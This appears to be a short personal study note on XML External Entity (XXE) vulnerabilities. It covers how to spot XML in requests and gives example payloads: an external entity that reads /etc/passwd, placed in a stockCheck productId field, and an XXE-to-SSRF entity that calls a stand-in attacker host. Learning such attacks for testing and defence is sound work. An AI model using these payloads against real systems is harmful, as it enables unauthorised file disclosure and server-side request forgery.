Second-brain

XML Vulnerability

1 min read

Injecting malicious XXE Code into the request and then calling it OR upload it via file upload vulnerability

XML language is mostly used for storing and transferring data Ex:

<person>
    <name>John Doe</name>
    <age>30</age>
    <email>john.doe@example.com</email>
</person>

Discovery :

Checking in requests and seeing a XML text storing some values

The Exploiting XML code may be like :

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> 
]>

Note : here above the command is in variable xxe so if we find a another variable being called in request we can use xxe instead like :

<stockCheck>
  <productId>&xxe;</productId>
  <storeId>3</storeId>
</stockCheck>

you can use several different PAYLOADS refer cheatsheet

XXE to SSRF :

An XXE request can also be made to connect to a remote server causing SSRF like :

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "https://evil_website.com">
]>

Graph View

Backlinks